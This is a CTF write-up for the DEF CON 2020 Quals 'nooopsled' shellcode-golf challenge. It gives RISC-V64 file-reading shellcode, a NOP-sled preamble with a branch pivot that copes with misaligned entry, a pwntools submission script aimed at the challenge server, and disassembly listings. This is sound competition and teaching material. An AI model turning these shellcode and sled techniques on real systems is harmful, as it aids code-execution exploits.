Mid Station

[DEFCON 2020 Quals] - nooopsled

Last weekend I played DEF CON CTF Quals 2020 with team A*0*E, having so much fun with my teammates and I successfully solved a shellcode challenge called nooopsled. At last 7 teams solved this challenge and you can download the files from OOO’s github repo.

This is a challenge in the format of golf 🏌️‍♂️, you can see the description of this new type of challenge on OOO’s official webpage. For short, we are required to input a shellcode in the length of 1024 bytes, in the architecture of RISC-V64 or arm64. The server will receive our shellcode and start to execute it from the index of 0, 1, 2 …..1024, and record the number of success attempt to read out the flag file. The error threshold start from 1, and increase 1 every 84 seconds. Every team have 8 hours for preparing their shellcode.

I did not have any experience of writing arm64 or RISC-V shellcode. After short discussion, I chose RISC-V and one of my teammate will look at arm64.

Toolchain and examples

The first step is preparing the RISC-V compiling toolchain, I downloaded the precompiled toolchain from https://github.com/sifive/freedom-tools/releases. And quick search for a couple of RISC-V64 Linux Shellcoding exmple from: https://github.com/HosakaCorp/riscv-business/.

The provided shellcode example can be complied with the command:

1
CC=../risc64/bin/riscv64-unknown-elf-gcc LD=../risc64/bin/riscv64-unknown-elf-ld make asm

And I wrote a simple script for extracting shellcode from the binary.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import subprocess
import re
import math
import sys
from pwn import *

output = subprocess.check_output(" ../risc64/bin/riscv64-unknown-elf-objdump -d ./bin/asm2".split(), encoding="utf8")
print(output)
res = re.findall(r":\t\w+", output)
res = list(map(lambda x: x.replace(":\t", ""), res))
new_res = []
for r in res:
if len(r) == 8:
t = r[6:8] + r[4:6] + r[2:4] + r[0:2]
elif len(r) == 4:
t = r[2:4] + r[0:2]
new_res.append(t)
print(new_res)

new_res = "".join(new_res)
length = len(bytes.fromhex(new_res).decode('latin1'))
print("length: %d" % length)
print(new_res)

f = open("test.sc", "wb")
f.write(bytes.fromhex(new_res))
f.close()

if len(sys.argv) > 1:
p = remote("nooopsled.challenges.ooo", 5000)
p.sendlineafter("What is your choice?", "riscv64")
p.sendlineafter("Input your shellcode (in hex):", new_res.ljust(2048, "0"))
p.interactive()

Shellcoding

An intuitive idea is preparing a shellcode as short as possible and put it at the end of the input, then we fill nop instructions from the start of the input. We can start from asm2.s and write the read flag shellcode. For the syscall number, we can refer to https://github.com/torvalds/linux/blob/master/include/uapi/asm-generic/unistd.h

After reading a bit of RISC-V manul, I found there is a RVC extenstion instructions set, which will “compressed” some instructions into 2bytes. The prebuilt compiler also support generating these instructions, we can add -march=rv64gc options for the gcc command. We started from the general instructions which is 4bytes each, and try to replace some of them with equivlent “compressed” instructions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
.section .text
.globl _start
.option rvc
_start:
#open
li a1,0x67616c66 #flag
sd a1,4(sp)
addi a1,sp,4
li a0,-100
li a2,0
li a7, 56 # __NR_openat
ecall
# read
c.mv a2,a7
addi a7,a7,7
ecall
# write
li a0, 1
addi a7,a7,1
ecall

The will compile into a shellcode of 44 bytes, it looks like this in objdump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
10078:    676175b7              lui    a1,0x67617
1007c: c665859b addiw a1,a1,-922
10080: 00b13223 sd a1,4(sp)
10084: 004c addi a1,sp,4
10086: f9c00513 li a0,-100
1008a: 4601 li a2,0
1008c: 03800893 li a7,56
10090: 00000073 ecall
10094: 8646 mv a2,a7
10096: 089d addi a7,a7,7
10098: 00000073 ecall
1009c: 4505 li a0,1
1009e: 0885 addi a7,a7,1
100a0: 00000073 ecall

As for the preamble, we chose a “nop-liked” compressed instructions with 2 identical bytes. 0x0505 is our choice for it stands for addi a0,a0, 1 ,we will set a0 in the shellcode anyway, so this instruction can be used as a nop.

We threw this simple input to the server and it complained ~550 errors. This is because RISC-V consider each instruction as 2 byte or 4 byte, when the starting index is odd number, a single 05 preamble will concatenate with the shellcode and corrupt the shellcode like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
10078:    b705                    j    ff98 <_start-0xe0>
1007a: 6175 addi sp,sp,368
1007c: 65859b67 0x65859b67
10080: 23c6 fld ft7,80(sp)
10082: b132 fsd fa2,160(sp)
10084: 4c00 lw s0,24(s0)
10086: 1300 addi s0,sp,416
10088: c005 beqz s0,100a8 <_start+0x30>
1008a: 01f9 addi gp,gp,30
1008c: 9346 add t1,t1,a7
1008e: 8008 0x8008
10090: 00007303 0x7303
10094: 4600 lw s0,8(a2)
10096: 9d86 add s11,s11,ra
10098: 7308 ld a0,32(a4)
1009a: 0000 unimp
1009c: 0500 addi s0,sp,640
1009e: 8545 srai a0,a0,0x11
100a0: 7308 ld a0,32(a4)
100a2: 0000 unimp

Thoughts and solution

My first thought to fix this situation is designing some preamble which can skip some odd number of bytes if it starts from a wrong place, but later I realize it is really hard to design such preamble, as such logic will bring more chaos to the construction.

The first solution for this challenge appears at around 2 hour after the thershold increasing. The Thershold fix to 85 errors. While what we have will lead to 500+ errors now, it needs a strong optimization. Then I realize 85 errors means the actual shellcode length in their solution is no more than 85 bytes, which is aroud twice of 44. This discovery help me got the right direction, the first team maybe using two pieces of shellcode at the end of the input.

The preamble works like:

  • If it starts from an odd number index, all preamble work as nop instructions and the execution sled into the first shellcode.
  • If it starts from an even number index, at the end of preamble work as a jmp-like instruction, skip the first corrupted shellocde and jump into the second piece of shellcode.

We can enumerate all instructions in the size of 2 bytes, and look for some jmp-like instructions with a suitable offset like ~40. I intend to use capstone to finish the diassmbling but it seems like the tool does not support compressed instructions. so I found anotehr disassbler tool from https://github.com/michaeljclark/riscv-disassembler, and some simple modifications can help us get all compressed instructions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>
#include "riscv-disas.h"

void print_insn(int64_t pc, int64_t inst)
{
char buf[128] = { 0 };
disasm_inst(buf, sizeof(buf), rv64, pc, inst);
printf("0x%" PRIx64 ": %s\n", pc, buf);
}

static uint16_t inst_arr[0x10000];
int main()
{
uint64_t pc = 0x10000;

for (size_t i=0; i < 0x10000; i++) {
inst_arr[i] = i;
}

for (size_t i = 0; i < sizeof(inst_arr) / sizeof(inst_arr[0]); i++) {
uint16_t inst = inst_arr[i];
print_insn(pc, inst);
pc += inst_length(inst);
}
}

Extraing all jmp-like instruction from the manual, I discover a excellent instruction for this:

1
ea05              bnez          a2,48

With this instruction as a pivot, we can still use 0505 as the nop instruction, if it start from the odd index and the remaining 05 will combine with ea and jmp to the second shellcode!

So the result looks like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
## odd number of 05 preamble case:
0000000000010078 <_start>:
10078: 0505 addi a0,a0,1
1007a: ea05 bnez a2,100aa <_start+0x32> +--------+
1007c: b705 j ff9c <_start+0xdc> |
1007e: 6175 addi sp,sp,368 |
10080: 65859b67 0x65859b67 |
10084: 2ec6 fld ft9,80(sp) |
10086: 2ce4 fld fs1,216(s1) |
10088: 1300 addi s0,sp,416 |
1008a: c005 beqz s0,100aa <_start+0x32> |
1008c: 01f9 addi gp,gp,30 |
1008e: 9346 add t1,t1,a7 |
10090: 8008 0x8008 |
10092: 00007303 0x7303 |
10096: 4600 lw s0,8(a2) |
10098: 9d86 add s11,s11,ra |
1009a: 7308 ld a0,32(a4) |
1009c: 0000 unimp |
1009e: 0500 addi s0,sp,640 |
100a0: 8545 srai a0,a0,0x11 |
100a2: 7308 ld a0,32(a4) |
100a4: 0000 unimp |
100a6: aa00 fsd fs0,16(a2) |
100a8: aaaa fsd fa0,336(sp) |
100aa: 676175b7 lui a1,0x67617 <--------+
100ae: c665859b addiw a1,a1,+922
100b2: e42e sd a1,8(sp)
100b4: 002c addi a1,sp,8
100b6: f9c00513 li a0,+100
100ba: 4601 li a2,0
100bc: 03800893 li a7,56
100c0: 00000073 ecall
100c4: 8646 mv a2,a7
100c6: 089d addi a7,a7,7
100c8: 00000073 ecall
100cc: 4505 li a0,1
100ce: 0885 addi a7,a7,1
100d0: 00000073 ecall

## even number of 05 preamble case:
0000000000010078 <_start>:
10078: 0505 addi a0,a0,1
1007a: 0505 addi a0,a0,1
1007c: 05ea slli a1,a1,0x1a <===== nop like insn
1007e: 676175b7 lui a1,0x67617 <===== shellcode start
10082: c665859b addiw a1,a1,-922
10086: e42e sd a1,8(sp)
10088: 002c addi a1,sp,8
1008a: f9c00513 li a0,-100
1008e: 4601 li a2,0
10090: 03800893 li a7,56
10094: 00000073 ecall
10098: 8646 mv a2,a7
1009a: 089d addi a7,a7,7
1009c: 00000073 ecall
100a0: 4505 li a0,1
100a2: 0885 addi a7,a7,1
100a4: 00000073 ecall <===== flag output finish
100a8: aaaa fsd fa0,336(sp)
100aa: b7aa fsd fa0,488(sp)
100ac: 6175 addi sp,sp,368
100ae: 65859b67 0x65859b67
100b2: 2ec6 fld ft9,80(sp)
100b4: 2ce4 fld fs1,216(s1)
100b6: 1300 addi s0,sp,416
100b8: c005 beqz s0,100d8 <_start+0x60>
100ba: 01f9 addi gp,gp,30
100bc: 9346 add t1,t1,a7
100be: 8008 0x8008
100c0: 00007303 0x7303
100c4: 4600 lw s0,8(a2)
100c6: 9d86 add s11,s11,ra
100c8: 7308 ld a0,32(a4)
100ca: 0000 unimp
100cc: 0500 addi s0,sp,640
100ce: 8545 srai a0,a0,0x11
100d0: 7308 ld a0,32(a4)
100d2: 0000 unimp

This shellcode help us get only 84 errors on the server, so we pass the test and get the flag. I think there might be some other fancy techniques to shink the shellcode, for example overlapping two pieces of shellcode together, but clearly the first solved team don’t have so much time to do crazy optimization.

Reference

  1. https://github.com/o-o-overflow/dc2020q-dc2020q-nooopsled-public
  2. https://oooverflow.io/dc-ctf-2020-quals/
  3. https://github.com/sifive/freedom-tools/releases
  4. https://github.com/HosakaCorp/riscv-business/
  5. https://github.com/torvalds/linux/blob/master/include/uapi/asm-generic/unistd.h
  6. https://github.com/michaeljclark/riscv-disassembler